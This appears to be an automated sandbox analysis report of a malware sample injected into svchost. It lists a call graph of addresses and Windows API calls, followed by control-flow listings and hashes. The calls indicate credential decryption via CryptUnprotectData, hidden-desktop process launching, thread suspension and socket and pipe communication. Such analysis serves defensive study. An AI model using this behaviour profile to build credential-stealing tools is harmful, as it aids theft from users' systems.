7df4f3b64d99 free 39576->39577 39578 7df4f3b64d9f 39576->39578 39577->39578 39579 7df4f3b62d94 39578->39579 39580 7df4f3b62da4 39579->39580 39581 7df4f3b62dad HeapCreate 39580->39581 39582 7df4f3b62dc6 39580->39582 39581->39582 39582->39548 39584 7df4f3b73291 39583->39584 39592 7df4f3b8f00c 39584->39592 39589 7df4f3b640a8 39588->39589 39590 7df4f3b640d2 39589->39590 39591 7df4f3b640b0 calloc 39589->39591 39590->39565 39591->39590 39595 7df4f3b8f043 __swprintf_l 39592->39595 39593 7df4f3b732a3 39594 7df4f3b8f117 calloc 39594->39595 39595->39593 39595->39594 40087 7df4f3b7683c CreateIoCompletionPort SetFileCompletionNotificationModes socket __swprintf_l 40079 7df4f3b824bc free calloc 39616 7df4f3b62b48 39617 7df4f3b62b9b 39616->39617 39618 7df4f3b62b5a 39616->39618 39618->39617 39619 7df4f3b62b7d ResumeThread 39618->39619 39619->39618 39620 7df4f3b76748 39621 7df4f3b76751 39620->39621 39623 7df4f3b767bc 39620->39623 39622 7df4f3b7678a getaddrinfo 39621->39622 39622->39623 40097 7df4f3b737c8 10 API calls 40062 7df4f3b7fe48 9 API calls __swprintf_l 39632 7df4f3b75bd3 39635 7df4f3b75bdd 39632->39635 39633 7df4f3b75c2b 39643 7df4f3b911dc 39633->39643 39635->39633 39639 7df4f3b91008 39635->39639 39637 7df4f3b75c1d free 39637->39635 39638 7df4f3b75bd5 __swprintf_l 39640 7df4f3b910d9 39639->39640 39641 7df4f3b91032 39639->39641 39640->39637 39641->39640 39647 7df4f3bc10a0 39641->39647 39644 7df4f3b911e1 39643->39644 39646 7df4f3b911f1 39643->39646 39665 7df4f3bc0968 39644->39665 39646->39638 39650 7df4f3bc0ad4 39647->39650 39649 7df4f3bc1151 39649->39640 39651 7df4f3bc0b21 39650->39651 39657 7df4f3bc0b17 __swprintf_l 39650->39657 39653 7df4f3bc0b47 39651->39653 39651->39657 39664 7df4f3bc01d8 malloc 39651->39664 39653->39657 39658 7df4f3b90fc4 malloc 39653->39658 39655 7df4f3bc0c9d 39655->39657 39660 7df4f3c5e854 39655->39660 39657->39649 39659 7df4f3b90fdc 39658->39659 39659->39655 39661 7df4f3c5e889 39660->39661 39663 7df4f3c5e880 39660->39663 39662 7df4f3c5e9c7 malloc 39661->39662 39661->39663 39662->39663 39663->39657 39664->39653 39666 7df4f3bc098f 39665->39666 39667 7df4f3bc0987 39665->39667 39666->39667 39669 7df4f3bc01d8 malloc 39666->39669 39667->39646 39669->39667 39670 7df4f3bb9a44 socket 39671 7df4f3bb9a8c 39670->39671 40081 7df4f3b73cd0 9 API calls 39672 7df4f3b808cc 39677 7df4f3b8091b 39672->39677 39673 7df4f3b80a04 CreateDesktopW 39674 7df4f3b80a39 CreateProcessW 39673->39674 39679 7df4f3b80b3b __swprintf_l 39673->39679 39676 7df4f3b80b00 GetExitCodeProcess 39674->39676 39674->39679 39676->39679 39680 7df4f3b80b24 39676->39680 39677->39673 39677->39679 39680->39679 39681 7df4f3b80b2e TerminateProcess 39680->39681 39681->39679 40088 7df4f3b8084c free CreateIoCompletionPort SetFileCompletionNotificationModes socket socket 40089 7df4f3b8a458 malloc free malloc free __swprintf_l 40098 7df4f3b7e3d8 7 API calls __swprintf_l 40090 7df4f3c3ec68 calloc __swprintf_l 39820 7df4f3b7e560 39821 7df4f3b7e582 __swprintf_l 39820->39821 39822 7df4f3b7e608 39821->39822 39825 7df4f3b8f180 malloc 39821->39825 39826 7df4f3b8f1b8 RtlDosPathNameToNtPathName_U 39825->39826 39827 7df4f3b7e5ff free 39825->39827 39828 7df4f3b8f225 NtAcceptConnectPort 39826->39828 39833 7df4f3b8f253 39826->39833 39827->39822 39828->39833 39829 7df4f3b8f312 free 39829->39827 39831 7df4f3b8f2fc 39831->39829 39832 7df4f3b8f308 NtAcceptConnectPort 39831->39832 39832->39829 39833->39829 39833->39831 39834 7df4f3b8e094 39833->39834 39835 7df4f3b8e0fc 39834->39835 39836 7df4f3b8e0a4 NtAcceptConnectPort 39834->39836 39835->39833 39836->39835 40083 7df4f3b864e0 CryptUnprotectData __swprintf_l 40070 7df4f3b63168 Thread32First CloseHandle SuspendThread ResumeThread 39837 7df4f3b85268 39838 7df4f3b85277 39837->39838 39839 7df4f3b85295 39837->39839 39843 7df4f3b899bc free CreateIoCompletionPort SetFileCompletionNotificationModes socket 39838->39843 39841 7df4f3b8527c 39841->39839 39844 7df4f3b851a0 calloc 39841->39844 39843->39841 39845 7df4f3b8525e 39844->39845 39846 7df4f3b851ca 39844->39846 39845->39839 39846->39845 39848 7df4f3b84834 free 39846->39848 39848->39845 39849 7df4f3b7d4e8 39850 7df4f3b7d4f9 39849->39850 39851 7df4f3b7d507 39849->39851 39853 7df4f3b8f32c 39850->39853 39855 7df4f3b8f353 39853->39855 39854 7df4f3b8f4eb 39854->39851 39855->39854 39856 7df4f3b8f3d0 NtAcceptConnectPort 39855->39856 39859 7df4f3b8f3fe 39855->39859 39856->39859 39857 7df4f3b8f4e2 free 39857->39854 39858 7df4f3b8f4af 39858->39857 39859->39857 39859->39858 39861 7df4f3b8e25c 39859->39861 39862 7df4f3b8e2af 39861->39862 39863 7df4f3b8e26f NtAcceptConnectPort 39861->39863 39862->39858 39863->39862 39864 7df4f3b8e170 39865 7df4f3b8e18f 39864->39865 39866 7df4f3b8e180 NtAcceptConnectPort 39864->39866 39866->39865 39871 7df4f3b73c70 39872 7df4f3b73c75 39871->39872 39876 7df4f3b73caa 39871->39876 39873 7df4f3b6456c calloc 39872->39873 39874 7df4f3b73ca2 39873->39874 39877 7df4f3b7ed34 39874->39877 39879 7df4f3b7ed5f __swprintf_l 39877->39879 39878 7df4f3b7f18f 39878->39876 39880 7df4f3b7f03f __swprintf_l 39879->39880 39883 7df4f3b9da28 39879->39883 39880->39878 39886 7df4f3bab6a8 7 API calls __swprintf_l 39880->39886 39887 7df4f3b9d42c 39883->39887 39885 7df4f3b9da50 39885->39879 39886->39880 39891 7df4f3b9d48b __swprintf_l 39887->39891 39888 7df4f3b9da01 __swprintf_l 39888->39885 39889 7df4f3b9d9f8 free 39889->39888 39890 7df4f3b87740 free 39890->39891 39891->39888 39891->39889 39891->39890 39892 7df4f3b757f0 39893 7df4f3b757f5 39892->39893 39894 7df4f3b7584b 39892->39894 39895 7df4f3b6456c calloc 39893->39895 39896 7df4f3b75821 39895->39896 39905 7df4f3b90724 39896->39905 39898 7df4f3b7582b 39899 7df4f3b7582f 39898->39899 39900 7df4f3b7584d 39898->39900 39910 7df4f3b7df0c 39899->39910 39901 7df4f3b7df0c 18 API calls 39900->39901 39901->39894 39903 7df4f3b75841 39921 7df4f3b63020 5 API calls __swprintf_l 39903->39921 39906 7df4f3b64090 calloc 39905->39906 39908 7df4f3b9073c 39906->39908 39907 7df4f3b9079c 39907->39898 39908->39907 39922 7df4f3b62e64 39908->39922 39937 7df4f3bfed6c 39910->39937 39914 7df4f3b7df34 39915 7df4f3b7dfc2 39914->39915 39956 7df4f3b7d818 39914->39956 39962 7df4f3b7c868 39915->39962 39918 7df4f3b7e031 39920 7df4f3c0576e 39918->39920 39967 7df4f3c0567c free GetSystemInfo __swprintf_l 39918->39967 39920->39903 39921->39894 39923 7df4f3b62e92 39922->39923 39927 7df4f3b62f3a __swprintf_l 39923->39927 39928 7df4f3b62704 39923->39928 39926 7df4f3b62efc 39926->39927 39931 7df4f3b6272c 39926->39931 39927->39907 39935 7df4f3b62514 GetSystemInfo 39928->39935 39933 7df4f3b62747 39931->39933 39932 7df4f3b62757 39932->39927 39933->39932 39934 7df4f3b6277e VirtualFree 39933->39934 39934->39932 39936 7df4f3b62545 39935->39936 39936->39926 39938 7df4f3bfed86 __swprintf_l 39937->39938 39948 7df4f3b7df1c 39937->39948 39940 7df4f3bfedd6 __swprintf_l 39938->39940 39938->39948 39980 7df4f3becbf8 free GetSystemInfo __swprintf_l 39938->39980 39944 7df4f3bfeee9 39940->39944 39940->39948 39981 7df4f3bf6ba4 free GetSystemInfo __swprintf_l 39940->39981 39943 7df4f3bfef13 39943->39948 39969 7df4f3bc3a10 39943->39969 39944->39948 39968 7df4f3bff224 free GetSystemInfo __swprintf_l 39944->39968 39949 7df4f3b7da74 39948->39949 39950 7df4f3b7da99 39949->39950 39955 7df4f3b7db66 __swprintf_l 39950->39955 39985 7df4f3b8e150 39950->39985 39953 7df4f3b7db52 39954 7df4f3b8e150 NtAcceptConnectPort 39953->39954 39954->39955 39955->39914 39957 7df4f3b7d835 calloc 39956->39957 39958 7df4f3b7d884 39957->39958 39959 7df4f3b7d853 39957->39959 39958->39915 39960 7df4f3b8f180 6 API calls 39959->39960 39961 7df4f3b7d87b free 39960->39961 39961->39958 39963 7df4f3b7c8c5 39962->39963 39964 7df4f3b7c881 39962->39964 39963->39918 39988 7df4f3b7c518 39964->39988 39966 7df4f3b7c8ac free 39966->39963 39966->39964 39967->39920 39968->39943 39970 7df4f3bc3a15 39969->39970 39972 7df4f3bc3a68 39969->39972 39971 7df4f3bc3a41 free 39970->39971 39970->39972 39971->39972 39973 7df4f3bed66c 39972->39973 39974 7df4f3bb3720 39973->39974 39975 7df4f3bed682 GetSystemInfo 39974->39975 39982 7df4f3bce3b0 39975->39982 39977 7df4f3bed6a0 39978 7df4f3bce3b0 __swprintf_l free 39977->39978 39979 7df4f3bed6ae 39978->39979 39979->39948 39980->39940 39981->39944 39983 7df4f3bfed6c __swprintf_l 2 API calls 39982->39983 39984 7df4f3bce3c2 __swprintf_l 39983->39984 39984->39977 39986 7df4f3b8e160 NtAcceptConnectPort 39985->39986 39987 7df4f3b7db40 malloc 39985->39987 39986->39987 39987->39953 39987->39955 39990 7df4f3b7c53d 39988->39990 39989 7df4f3b7c7e2 39989->39966 39990->39989 39997 7df4f3b91110 malloc __swprintf_l 39990->39997 39992 7df4f3b7c7d3 39993 7df4f3b911dc malloc 39992->39993 39993->39989 39994 7df4f3b7c764 39994->39989 39994->39992 39996 7df4f3b91008 2 API calls 39994->39996 39998 7df4f3b91520 SetFilePointer CreateFileW ReadFile malloc malloc 39994->39998 39996->39994 39997->39994 39998->39994 40022 7df4f3b860f0 40023 7df4f3b86183 __swprintf_l 40022->40023 40024 7df4f3b86112 __swprintf_l 40022->40024 40024->40023 40025 7df4f3b86151 CryptUnprotectData 40024->40025 40025->40023 40026 7df4f3b7c0f0 40028 7df4f3b7c105 40026->40028 40027 7df4f3b7c1c5 40028->40027 40032 7df4f3b88c74 40028->40032 40030 7df4f3b87740 free 40030->40027 40031 7df4f3b7c193 40031->40030 40034 7df4f3b88ca9 40032->40034 40033 7df4f3b88e80 40033->40031 40034->40033 40035 7df4f3b88e02 40034->40035 40037 7df4f3b88e85 40034->40037 40039 7df4f3b884a4 malloc free malloc __swprintf_l 40035->40039 40037->40033 40040 7df4f3b884a4 malloc free malloc __swprintf_l 40037->40040 40039->40033 40040->40033 40099 7df4f3b8cbe8 free NtAcceptConnectPort __swprintf_l 40041 7df4f3b6286c 40043 7df4f3b6289f 40041->40043 40042 7df4f3b62978 40044 7df4f3b62ace 40042->40044 40047 7df4f3b629b1 SuspendThread 40042->40047 40043->40042 40045 7df4f3b628c0 Thread32First 40043->40045 40046 7df4f3b628c5 40045->40046 40048 7df4f3b6296f CloseHandle 40046->40048 40047->40042 40048->40042 40100 7df4f3b7bfec NtAcceptConnectPort NtAcceptConnectPort free 39466 7df4f3b733f8 39467 7df4f3b73412 39466->39467 39468 7df4f3b73417 LoadLibraryA 39467->39468 39469 7df4f3b7341c 39467->39469 39468->39469 40073 7df4f3b7dcf4 NtAcceptConnectPort 39502 7df4f3bb7ef8 39503 7df4f3bb7f1c 39502->39503 39504 7df4f3bb7f02 39502->39504 39504->39503 39506 7df4f3bb9968 39504->39506 39509 7df4f3bb9878 39506->39509 39508 7df4f3bb9999 __swprintf_l 39508->39503 39510 7df4f3bb989c socket 39509->39510 39513 7df4f3bb98b4 39509->39513 39511 7df4f3bb98cf 39510->39511 39510->39513 39511->39513 39514 7df4f3bb9488 39511->39514 39513->39508 39515 7df4f3bb94ba 39514->39515 39516 7df4f3bb94dd CreateIoCompletionPort 39515->39516 39517 7df4f3bb94c5 39515->39517 39518 7df4f3bb94f5 39516->39518 39517->39513 39518->39517 39519 7df4f3bb952a SetFileCompletionNotificationModes 39518->39519 39519->39517 39596 22c9e061cf4 39598 22c9e061d19 39596->39598 39597 22c9e061fa1 39598->39597 39605 22c9e0615c0 39598->39605 39600 22c9e061f98 CloseHandle 39600->39597 39601 22c9e061f88 NtAcceptConnectPort 39601->39600 39602 22c9e061e3a 39602->39600 39602->39601 39608 22c9e061aa4 39602->39608 39604 22c9e061f76 39604->39601 39606 22c9e0615f4 NtAcceptConnectPort 39605->39606 39606->39602 39609 22c9e061aef 39608->39609 39610 22c9e061b10 39609->39610 39612 22c9e061870 39609->39612 39610->39604 39614 22c9e061889 39612->39614 39613 22c9e061949 39613->39610 39614->39613 39615 22c9e061930 GetProcessMitigationPolicy 39614->39615 39615->39613 40053 7df4f3b7d6fc 8 API calls __swprintf_l 39624 7df4f3b6ff84 malloc 39625 7df4f3b6ff98 39624->39625 39626 7df4f3cae001 39627 7df4f3cae05b 39626->39627 39630 7df4f3cae003 VirtualFree 39627->39630 39631 7df4f3cae032 39630->39631 40094 7df4f3b73c10 10 API calls 39682 7df4f3b8a38c 39683 7df4f3b8a457 39682->39683 39684 7df4f3b8a395 39682->39684 39685 7df4f3b6456c calloc 39684->39685 39686 7df4f3b8a3cf CoInitializeEx 39685->39686 39687 7df4f3b8a3ed 39686->39687 39691 7df4f3b7a828 39687->39691 39689 7df4f3b8a414 39690 7df4f3b8a446 free 39689->39690 39690->39683 39692 7df4f3b7a908 39691->39692 39693 7df4f3b7a84d 39691->39693 39695 7df4f3b7a8fd 39692->39695 39696 7df4f3b7a912 39692->39696 39694 7df4f3b7a853 39693->39694 39693->39695 39698 7df4f3b7a866 39694->39698 39699 7df4f3b7a8c3 39694->39699 39703 7df4f3b7a89c 39694->39703 39740 7df4f3b795f8 9 API calls __swprintf_l 39695->39740 39697 7df4f3b7a9d5 39696->39697 39704 7df4f3b7a929 39696->39704 39739 7df4f3b798d8 8 API calls __swprintf_l 39697->39739 39706 7df4f3b7a884 39698->39706 39709 7df4f3b7a870 39698->39709 39738 7df4f3b78bfc 8 API calls __swprintf_l 39699->39738 39703->39689 39704->39703 39714 7df4f3b7a0ac 39704->39714 39736 7df4f3b793a8 9 API calls __swprintf_l 39706->39736 39708 7df4f3b7a99c 39708->39703 39726 7df4f3b79ba4 39708->39726 39709->39703 39737 7df4f3b78fb0 9 API calls __swprintf_l 39709->39737 39712 7df4f3b7a9b2 39712->39703 39713 7df4f3b7a0ac 5 API calls 39712->39713 39713->39703 39715 7df4f3b7a109 39714->39715 39741 7df4f3b8e3e8 39715->39741 39717 7df4f3b7a4fb __swprintf_l 39717->39708 39718 7df4f3b7a111 39718->39717 39719 7df4f3b7a32d CreateFileMappingW 39718->39719 39720 7df4f3b7a37a 39719->39720 39725 7df4f3b7a3a7 39719->39725 39744 7df4f3b79f24 39720->39744 39722 7df4f3b7a48a calloc 39722->39717 39723 7df4f3b7a4aa __swprintf_l 39722->39723 39724 7df4f3b79f24 2 API calls 39723->39724 39724->39717 39725->39717 39725->39722 39727 7df4f3b79be7 39726->39727 39728 7df4f3b79cb2 free 39727->39728 39729 7df4f3b79cd6 39727->39729 39728->39727 39730 7df4f3b79ddf CreateFileMappingW 39729->39730 39733 7df4f3b79e13 __swprintf_l 39730->39733 39735 7df4f3b79ea6 39730->39735 39732 7df4f3b79ef9 __swprintf_l 39732->39712 39750 7df4f3b90bc4 39733->39750 39758 7df4f3b87740 39735->39758 39736->39703 39737->39703 39738->39703 39739->39703 39740->39703 39742 7df4f3b8e3fc NtAcceptConnectPort 39741->39742 39743 7df4f3b8e416 39741->39743 39742->39743 39743->39718 39745 7df4f3b79f4f 39744->39745 39746 7df4f3b79f5b CreateFileW 39745->39746 39749 7df4f3b7a03d 39745->39749 39748 7df4f3b79f8f 39746->39748 39746->39749 39747 7df4f3b7a009 ReadFile 39747->39749 39748->39747 39748->39749 39749->39725 39751 7df4f3b90c1f 39750->39751 39752 7df4f3b90c89 CreateProcessW 39751->39752 39757 7df4f3b90d28 __swprintf_l 39751->39757 39753 7df4f3b90cd7 39752->39753 39753->39757 39762 7df4f3b8e910 39753->39762 39755 7df4f3b90d16 39755->39757 39776 7df4f3b8e3c8 39755->39776 39757->39735 39759 7df4f3b87753 39758->39759 39760 7df4f3b8776f 39758->39760 39759->39760 39761 7df4f3b87766 free 39759->39761 39760->39732 39761->39760 39764 7df4f3b8e967 39762->39764 39763 7df4f3b8eeb6 __swprintf_l 39763->39755 39764->39763 39765 7df4f3b8e9ff calloc 39764->39765 39765->39763 39769 7df4f3b8ea16 __swprintf_l 39765->39769 39766 7df4f3b8eb9d free 39766->39763 39767 7df4f3b8ebb4 39766->39767 39767->39763 39768 7df4f3b8ebc9 NtAcceptConnectPort 39767->39768 39774 7df4f3b8ebea 39767->39774 39768->39774 39769->39766 39770 7df4f3b8ea7e DuplicateHandle 39769->39770 39771 7df4f3b8eb92 39770->39771 39772 7df4f3b8eaaf __swprintf_l 39770->39772 39771->39766 39772->39771 39773 7df4f3b8eb6e NtAcceptConnectPort 39772->39773 39773->39766 39774->39763 39775 7df4f3b8ee93 NtAcceptConnectPort 39774->39775 39775->39763 39777 7df4f3b8e3dc 39776->39777 39778 7df4f3b8e3d8 NtAcceptConnectPort 39776->39778 39777->39757 39778->39777 39779 7df4f3b87598 39780 7df4f3b875b8 39779->39780 39781 7df4f3b87662 malloc 39779->39781 39780->39781 39783 7df4f3b875d5 39780->39783 39782 7df4f3b875ff 39781->39782 39783->39782 39784 7df4f3b87623 malloc 39783->39784 39787 7df4f3b616e0 39784->39787 39786 7df4f3b87650 free 39786->39782 39788 7df4f3b616ec __swprintf_l 39787->39788 39788->39786 40054 7df4f3b7cb18 malloc free malloc __swprintf_l 40084 7df4f3b78494 19 API calls 39789 7df4f3b75da0 39791 7df4f3b75da5 39789->39791 39792 7df4f3b75e2b 39791->39792 39795 7df4f3b9128c 39791->39795 39793 7df4f3b911dc malloc 39792->39793 39794 7df4f3b75bd5 __swprintf_l 39793->39794 39796 7df4f3b914de 39795->39796 39797 7df4f3b912b5 39795->39797 39796->39791 39797->39796 39809 7df4f3b91214 39797->39809 39799 7df4f3b912fd 39799->39796 39800 7df4f3b90fc4 malloc 39799->39800 39801 7df4f3b91313 39800->39801 39801->39796 39813 7df4f3b90e5c CreateFileW 39801->39813 39804 7df4f3b913bb 39804->39796 39805 7df4f3bc10a0 2 API calls 39804->39805 39808 7df4f3b91459 39805->39808 39806 7df4f3b9146f ReadFile 39806->39808 39808->39796 39808->39806 39818 7df4f3b90dcc 39808->39818 39810 7df4f3b91227 39809->39810 39811 7df4f3b90fc4 malloc 39810->39811 39812 7df4f3b9125a 39810->39812 39811->39812 39812->39799 39814 7df4f3b90eac CreateFileW 39813->39814 39815 7df4f3b90eb1 ReadFile 39813->39815 39814->39796 39814->39804 39816 7df4f3b90edc 39815->39816 39816->39814 39816->39815 39817 7df4f3b90dcc SetFilePointer 39816->39817 39817->39816 39819 7df4f3b90ddf SetFilePointer 39818->39819 39819->39808 40059 7df4f3b86aa0 6 API calls __swprintf_l 40055 7df4f3b76f1c free 40102 7df4f3b857a8 CreateNamedPipeW BindIoCompletionCallback ConnectNamedPipe free 39867 7df4f3b73424 39868 7df4f3b73440 39867->39868 39869 7df4f3b73445 GetProcAddressForCaller 39868->39869 39870 7df4f3b7344e 39868->39870 39869->39870 40075 7df4f3b89524 malloc free malloc calloc 39999 7df4f3bb7fa4 40000 7df4f3bb7fae 39999->40000 40001 7df4f3bb7fc8 39999->40001 40000->40001 40003 7df4f3bb8420 40000->40003 40004 7df4f3bb8454 40003->40004 40008 7df4f3bb843d 40003->40008 40005 7df4f3bb8461 socket 40004->40005 40004->40008 40006 7df4f3bb848a 40005->40006 40005->40008 40009 7df4f3bb8194 40006->40009 40008->40001 40011 7df4f3bb81e6 40009->40011 40010 7df4f3bb81f1 __swprintf_l 40010->40008 40011->40010 40012 7df4f3bb823d CreateIoCompletionPort 40011->40012 40012->40010 40013 7df4f3bb8255 40012->40013 40013->40010 40014 7df4f3bb8296 SetFileCompletionNotificationModes 40013->40014 40014->40010 40015 7df4f3b859b0 40016 7df4f3b85a03 40015->40016 40017 7df4f3b85a2f CreateNamedPipeW 40016->40017 40018 7df4f3b85a77 40017->40018 40021 7df4f3b85ab9 __swprintf_l 40017->40021 40019 7df4f3b85a90 BindIoCompletionCallback 40018->40019 40020 7df4f3b85aa8 ConnectNamedPipe 40019->40020 40019->40021 40020->40021

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 00007DF4F3B8E910 Relevance: 18.1, APIs: 6, Strings: 4, Instructions: 563nativeCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 0 7df4f3b8e910-7df4f3b8e965 1 7df4f3b8e96c-7df4f3b8e977 call 7df4f3b754dc 0->1 2 7df4f3b8e967 0->2 5 7df4f3b8e97d-7df4f3b8e9a3 1->5 6 7df4f3b8eedf-7df4f3b8ef04 call 7df4f3bb3700 1->6 2->1 7 7df4f3b8e9a5-7df4f3b8e9b2 5->7 8 7df4f3b8e9b6-7df4f3b8e9c5 5->8 7->8 10 7df4f3b8e9f3-7df4f3b8e9f4 8->10 11 7df4f3b8e9c7-7df4f3b8e9f1 8->11 13 7df4f3b8e9f6-7df4f3b8e9f9 10->13 11->13 13->6 15 7df4f3b8e9ff-7df4f3b8ea10 calloc 13->15 15->6 16 7df4f3b8ea16-7df4f3b8ea1c 15->16 17 7df4f3b8eb9d-7df4f3b8ebae free 16->17 18 7df4f3b8ea22-7df4f3b8ea27 16->18 17->6 19 7df4f3b8ebb4-7df4f3b8ebb7 17->19 18->17 20 7df4f3b8ea2d-7df4f3b8ea41 call 7df4f3b616e0 18->20 19->6 21 7df4f3b8ebbd-7df4f3b8ebc7 19->21 27 7df4f3b8ea43-7df4f3b8ea47 20->27 28 7df4f3b8ea78-7df4f3b8eaa9 DuplicateHandle 20->28 23 7df4f3b8ebc9-7df4f3b8ebe8 NtAcceptConnectPort 21->23 24 7df4f3b8ebea 21->24 26 7df4f3b8ebec-7df4f3b8ebee 23->26 24->26 26->6 29 7df4f3b8ebf4-7df4f3b8ec03 26->29 30 7df4f3b8ea49-7df4f3b8ea6c call 7df4f3b616e0 27->30 35 7df4f3b8eaaf-7df4f3b8eab9 28->35 36 7df4f3b8eb97 28->36 32 7df4f3b8ec33-7df4f3b8ec34 29->32 33 7df4f3b8ec05-7df4f3b8ec31 29->33 41 7df4f3b8ea6e-7df4f3b8ea73 30->41 37 7df4f3b8ec36-7df4f3b8ec39 32->37 33->37 46 7df4f3b8eb04-7df4f3b8eb43 35->46 47 7df4f3b8eabb-7df4f3b8eafb 35->47 36->17 37->6 40 7df4f3b8ec3f-7df4f3b8ec4a 37->40 43 7df4f3b8ec4c-7df4f3b8ec78 40->43 44 7df4f3b8ec7a-7df4f3b8ec7b 40->44 41->28 45 7df4f3b8ec7d-7df4f3b8ec80 43->45 44->45 45->6 48 7df4f3b8ec86-7df4f3b8ec89 45->48 50 7df4f3b8eb58-7df4f3b8eb6c 46->50 51 7df4f3b8eb45-7df4f3b8eb46 46->51 49 7df4f3b8eafd-7df4f3b8eb02 47->49 47->50 53 7df4f3b8ecb7-7df4f3b8ecb8 48->53 54 7df4f3b8ec8b-7df4f3b8ecb5 48->54 55 7df4f3b8eb4a-7df4f3b8eb53 call 7df4f3b616e0 49->55 56 7df4f3b8eb6e-7df4f3b8eb90 NtAcceptConnectPort 50->56 57 7df4f3b8eb92-7df4f3b8eb95 50->57 51->55 58 7df4f3b8ecba-7df4f3b8ecbd 53->58 54->58 55->50 56->17 57->17 58->6 61 7df4f3b8ecc3-7df4f3b8ecd6 58->61 62 7df4f3b8ed0f-7df4f3b8ed12 61->62 63 7df4f3b8ecd8-7df4f3b8ecdb 61->63 64 7df4f3b8ed33 62->64 65 7df4f3b8ed14-7df4f3b8ed31 62->65 66 7df4f3b8ecfc 63->66 67 7df4f3b8ecdd-7df4f3b8ecfa 63->67 68 7df4f3b8ed35-7df4f3b8ed37 64->68 65->68 69 7df4f3b8ecfe-7df4f3b8ed00 66->69 67->69 68->6 71 7df4f3b8ed3d 68->71 69->6 73 7df4f3b8ed06-7df4f3b8ed0d 69->73 74 7df4f3b8ed44-7df4f3b8ed4a 71->74 73->74 74->6 75 7df4f3b8ed50-7df4f3b8ed6e 74->75 76 7df4f3b8ed9e 75->76 77 7df4f3b8ed70-7df4f3b8ed9c 75->77 78 7df4f3b8eda0-7df4f3b8eda2 76->78 77->78 78->6 80 7df4f3b8eda8-7df4f3b8edab 78->80 81 7df4f3b8edad-7df4f3b8edef 80->81 82 7df4f3b8edf1-7df4f3b8ee3a 80->82 83 7df4f3b8ee3f-7df4f3b8ee51 81->83 82->83 84 7df4f3b8ee81 83->84 85 7df4f3b8ee53-7df4f3b8ee7f 83->85 86 7df4f3b8ee83-7df4f3b8ee85 84->86 85->86 86->6 88 7df4f3b8ee87-7df4f3b8ee91 86->88 89 7df4f3b8ee93-7df4f3b8eeb4 NtAcceptConnectPort 88->89 90 7df4f3b8eeb6-7df4f3b8eeb9 88->90 89->90 91 7df4f3b8eeda-7df4f3b8eedc 90->91 92 7df4f3b8eebb-7df4f3b8eed7 90->92 91->6 92->91
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AcceptConnectPort$DuplicateHandlecallocfree
                                                                                                                                                  • String ID: ,$,$H$H
                                                                                                                                                  • API String ID: 2459737528-3578512806
                                                                                                                                                  • Opcode ID: a9947afaaa98f1177199e84ab3dbda009d5fccaad9051c9b13383d687201c208
                                                                                                                                                  • Instruction ID: 03ff021bc901960b0dc0dd5d24008a18e82bbcee3e18b70a519756a1190c9e88
                                                                                                                                                  • Opcode Fuzzy Hash: a9947afaaa98f1177199e84ab3dbda009d5fccaad9051c9b13383d687201c208
                                                                                                                                                  • Instruction Fuzzy Hash: BE02643061CB888BD764DF18D89566AB7E1FFD8301F50097ED5CEC3291DA74E9868B82
                                                                                                                                                  Function 00007DF4F3B8F180 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 156nativeCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AcceptConnectPathPort$NameName_freemalloc
                                                                                                                                                  • String ID: $0$@
                                                                                                                                                  • API String ID: 3298263305-2347541974
                                                                                                                                                  • Opcode ID: 41dfd5aa33c42447b157757b265737d871a333bd75be70a4a10737d4b23bee9e
                                                                                                                                                  • Instruction ID: 84e5d160c1929391cc4559be7892535039d4bc378bc955e867c833e6ba803573
                                                                                                                                                  • Opcode Fuzzy Hash: 41dfd5aa33c42447b157757b265737d871a333bd75be70a4a10737d4b23bee9e
                                                                                                                                                  • Instruction Fuzzy Hash: 62516F349287888FD764DF5494967AA77E0FB89301F50456EE48EC2242DB74E4C68B83
                                                                                                                                                  Function 00007DF4F3B8F32C Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 158nativeCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AcceptConnectPortfree
                                                                                                                                                  • String ID: $0$@
                                                                                                                                                  • API String ID: 2184535508-2347541974
                                                                                                                                                  • Opcode ID: 3f154c0dcd698207b74ecbf3349ee8280ba9b90b83e006a876e2d17fed3398f1
                                                                                                                                                  • Instruction ID: edfe9e550d8d04a6a9fa6238574577473e934a75ac0719337c164dfa257a7bdb
                                                                                                                                                  • Opcode Fuzzy Hash: 3f154c0dcd698207b74ecbf3349ee8280ba9b90b83e006a876e2d17fed3398f1
                                                                                                                                                  • Instruction Fuzzy Hash: 8A51393060CB898FE7A4DF68D464BABB7E5FFD8301F54092EA48EC2251DB74D5858B42
                                                                                                                                                  Function 00007DF4F3B80B80 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
